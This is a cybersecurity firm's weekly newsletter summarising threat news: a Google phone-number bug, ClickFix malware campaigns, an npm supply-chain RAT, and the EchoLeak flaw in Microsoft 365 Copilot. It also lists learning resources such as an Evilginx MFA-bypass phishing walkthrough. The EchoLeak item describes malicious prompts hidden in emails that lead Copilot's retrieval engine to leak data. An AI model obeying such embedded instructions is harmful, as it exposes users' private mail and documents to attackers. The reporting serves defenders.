Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Google Patches Critical Vulnerability Exposing Account-Linked Phone Numbers
Google has fixed a serious bug that allowed attackers to uncover phone numbers linked to accounts, posing risks for phishing and SIM-swapping attacks. The vulnerability, discovered by researcher BruteCat, was patched to protect users from potential identity theft and fraud.
Key takeaways:
🕵️♂️ Vulnerability Discovered: Security researcher BruteCat identified a flaw that enables attackers to brute-force phone numbers tied to Google accounts using only a profile name and partial phone number data.
⚠️ Security Risks: The exposed phone numbers could be exploited for targeted phishing (vishing) or SIM swapping attacks, significantly compromising user privacy and account security.
� Google’s Response: Google promptly patched the vulnerability to prevent further exploitation, safeguarding accounts from unauthorized access.
🔒 Broader Implications: This incident underscores the ongoing need for robust security measures to safeguard sensitive personal information against evolving cyber threats.
New Atomic macOS Stealer Campaign Targets Apple Users with ClickFix Social Engineering
A new macOS malware campaign utilizes fake Spectrum CAPTCHA pages to deceive users into executing malicious scripts, which then deploy Atomic Stealer to harvest passwords and cryptocurrency wallets. Russian-speaking cybercriminals exploit ClickFix tactics, urging macOS users to verify URLs and avoid unsolicited commands.
Key takeaways:
🕵️ ClickFix Deception: The campaign employs the ClickFix social engineering tactic, using typosquatted Spectrum domains to serve fake CAPTCHA pages that trick macOS users into running malicious shell scripts via Terminal, deploying Atomic macOS Stealer (AMOS).
🦠 Atomic Stealer Capabilities: AMOS, a Golang-based malware, steals system passwords, Keychain data, browser credentials, and cryptocurrency wallet details, with Russian language comments in the code suggesting Russian-speaking perpetrators.
🔓 Bypassing Security: The malware utilizes native macOS commands to harvest credentials and circumvent security mechanisms, with poorly implemented delivery sites displaying mismatched instructions (e.g., Windows-specific commands for macOS users).
🌐 Broader Campaign Context: The attack also targets Windows, Android, and iOS users with different payloads, utilizing drive-by downloads and redirections, aligning with a surge in ClickFix campaigns that deliver various malware families.
🛡️ Mitigation Advice: Users should avoid executing Terminal commands from untrusted sources, verify website domains, update macOS and browsers, and use real-time antivirus protection to detect and block AMOS infections.
Cybercriminals Exploit Booking.com with Fake Sites to Deploy AsyncRAT Malware
Cybercriminals are targeting travelers with fake Booking.com sites, using malicious links and ClickFix tactics to deliver AsyncRAT malware, stealing sensitive data. Travelers are urged to verify URLs and avoid suspicious instructions to stay safe during the holiday season.
Key takeaways:
🕵️ Fake Booking.com Sites: Since mid-May 2025, cybercriminals have used fake Booking.com websites, promoted via gaming sites, social media, and sponsored ads, to trick users into downloading AsyncRAT, a Remote Access Trojan, exploiting the 40% of travelers who book via general online searches.
🦠 ClickFix Attack Method: The campaign employs a ClickFix social engineering tactic, prompting users to copy and paste obfuscated PowerShell scripts (e.g., “pOwERsheLl –N”O”p”rO””) that execute hidden malware, granting attackers full control over infected devices to steal financial and personal data.
🔄 Dynamic Redirects: The attack uses dynamic redirects, changing destinations every 2-3 days to evade detection, making it challenging for security teams to block the malicious sites.
🛡️ Mitigation Recommendations: Travelers should verify website URLs, avoid executing unsolicited scripts, and use trusted booking platforms directly, while Malwarebytes’ Scam Guard can help detect such phishing attempts.
⚠️ Broader Threat Context: This campaign aligns with a rise in sophisticated scams targeting the hospitality industry, with fake CAPTCHAs and trusted platform abuse becoming common tactics to deceive both users and hotel staff.
Massive Supply Chain Attack Targets Gluestack npm Packages, Endangering 960K Weekly Downloads
A supply chain attack has compromised 17 Gluestack npm packages, impacting over 960K weekly downloads with malicious code acting as a remote access trojan. Developers must urgently remove affected packages and roll back to secure versions to prevent data theft and system control.
Key takeaways:
🕵️ Widespread Compromise: cyber security firm Aikido Security discovered that 17 of 20 Gluestack @react-native-aria npm packages, with ~960,000 weekly downloads, were injected with malicious code in the lib/commonjs/index.js file, functioning as a remote access trojan (RAT).
🦠 Malware Capabilities: The malicious code enables attackers to execute shell commands, capture screenshots, and upload files from infected systems, posing significant risks to developers and CI/CD pipelines that utilize these packages.
📧 Covert Communication: The attack utilizes hardcoded SMTP credentials to establish a connection to an attacker-controlled mailbox, enabling data exfiltration and remote control, with new compromised versions being published as recently as June 7, 2025.
🛡️ Mitigation Actions: Developers are urged to remove the affected packages, roll back to uncompromised versions (all fully deprecated), and implement version pinning, dependency scanning, and file integrity monitoring to prevent further infections.
⚠️ Broader Context: This attack follows a pattern of supply chain threats targeting open-source ecosystems, with similar incidents recently hitting npm, PyPI, and Ruby, highlighting the growing risk to software development pipelines.
Microsoft 365 Copilot Zero-Click AI Flaw ‘EchoLeak’ Exposes Sensitive Data
A zero-click AI vulnerability, EchoLeak, in Microsoft 365 Copilot allowed attackers to steal sensitive data via email without user interaction. Discovered by Aim Security and patched by Microsoft, this first-of-its-kind flaw highlights new AI security risks.
Key takeaways:
🕵️♂️ EchoLeak Vulnerability: Discovered by Aim Security in January 2025, the zero-click flaw (CVE-2025-32711) in Microsoft 365 Copilot enabled attackers to exfiltrate sensitive data by embedding malicious prompts in emails, exploiting the AI’s Retrieval-Augmented Generation (RAG) engine.
⚠️ No User Interaction Needed: The attack required only sending an email, which Copilot could later retrieve during unrelated queries, thereby leaking data such as emails and documents without requiring user clicks or downloads.
🛠️ Microsoft’s Fix: Microsoft has patched the vulnerability, ensuring Copilot no longer processes malicious prompts; however, details on the fix remain limited.
🔍 New Threat Class: Dubbed an LLM Scope Violation, EchoLeak marks the first known zero-click AI attack, raising concerns about AI agents’ data handling and potential for similar vulnerabilities.
🔒 Industry Implications: The flaw highlights the need for enhanced AI security measures, as researchers caution that default settings may not be sufficient to protect sensitive data in AI-integrated systems.
Top Tips of the Week
Threat Intelligence
- Conduct threat intelligence simulations. Practice scenarios to improve skills and readiness for real-world threats.
- Integrate CTI into threat intelligence platforms (TIPs). Streamline workflows for efficient data collection and analysis.
- Foster a threat intelligence culture. Ensure that all team members understand the value and application of threat intelligence.
Threat Hunting
- Implement a threat intelligence sharing agreement with trusted partners. External collaboration enhances overall capabilities.
- Share findings with the cybersecurity community. Collective insights strengthen everyone’s ability to respond to cyber threats.
- Use CTI to enhance threat hunting. Combine proactive and reactive strategies for a comprehensive security approach.
Custom Tooling
- Consider the maintainability of custom tools. Create solutions that are easy to update, modify, and adapt to changing requirements.
Feature Video
The pyramid models how much pain we can inflict on the bad guys. It shows how some IOCs (Indicators of Compromise) are more difficult for an adversary to change than others, and denying the adversary certain indicators causes them a greater loss (more pain) than denying them others.
As defenders, we should aim to target the indicators that cause a greater loss to the adversary to bolster our defenses!
Feature Course
Learning Resources
Must Learn Python Tools for Cyber Security
If you write Python scripts for automation, incident response, threat hunting, or analysis, these four tools can radically improve your workflow:
🚀 UV: A lightning-fast alternative to pip. UV installs packages 100x faster and automatically manages virtual environments. No more dependency nightmares.
📊 Streamlit: Instantly turn your Python scripts into interactive dashboards. Perfect for visualizing logs, alerts, or risk scores without touching HTML/JS.
🧪 python-dotenv: Keep your API keys and secrets out of your codebase. Just two lines to load .env files securely — essential for all your SOC automation.
🎨 Rich & Textual: Create beautifully styled terminal UIs. Think live dashboards, CPU monitors, or colorful CLI tools — all from your console.
Even if you’re not a developer full-time, these tools can help you move faster, stay secure, and build solutions that scale.
Check out the video below to learn more about these excellent Python tools and start building faster, cleaner, and more secure code right now!
Going Phishing With Evilginx
If you’re serious about simulating real-world phishing attacks, this breakdown is gold! It’s a deep dive on building a complete phishing infrastructure using Evilginx2 — the exact framework used in red team engagements to bypass MFA and capture session tokens.
Here’s what stood out:
🛠️ End-to-end setup: From domain registration (think: azureportal.cam) to DNS records and Azure VM config.
🎣 Evilginx2 in action: Reverse proxy phishing that intercepts creds + MFA tokens in real time.
🔒 Defensive value: Understand how attackers operate so you can design better detections, controls, and user training.
If you’re on the blue team or the red team, watching how MFA can be sidestepped through legitimate-looking phishing lures is a must. Let’s sharpen our skills and stay one step ahead!
Your Meetings Might Be the Hidden Vulnerability in Your Workflow
Ever sat in a meeting and thought, “This could’ve been a Slack message”? You’re not alone!
But what if you could 10x the ROI of every meeting — and use AI to do it? Here are five tactical tips I just learned from a brilliant video on meeting strategy
🧠 Run a 3S test before every meeting: Sensitivity, Scope, Stakes — if it’s not high on all three, maybe it doesn’t need to be a meeting.
🎯 Define the goal upfront — like an incident response plan, clarity BEFORE action is key.
📂 Send context before — treat it like a briefing doc. AI tools like Otter can help collect insights from past meetings.
🧑💻 Let AI take notes — Otter.ai auto-summarizes, freeing you to focus on real-time discussions and escalation paths.
✅ Always end with clarity — document action items, assign ownership, and follow up fast.
Whether you’re coordinating across SOC, GRC, engineering, or dev teams, this is how to stop wasting time and start making meetings a force multiplier.
Cyber Security Awareness: Making it Real for Everyone
In a recent episode of Simply Defensive, Chuck Sapp, a cyber security awareness specialist, shared his unique approach to making cyber security engaging for all ages.
Chuck’s journey from the Marine Corps and Army to the cyber security field gives him a unique perspective. He emphasizes the importance of understanding the specific threats relevant to particular audiences and using relatable storytelling to convey the message effectively.
Key takeaways:
💬 Tailored messaging: Cyber security awareness should be tailored to different age groups and their specific concerns.
👥 Real-life examples: Using real-life examples, such as AI voice scams, makes cyber security concepts relatable.
🤝 Collaboration: Partnership and open communication within cyber security teams are crucial for effective threat response.
If you’re looking to break into the field, transition from another career, or move up the corporate ladder, this interview is packed with insights you can use. Give it a listen!
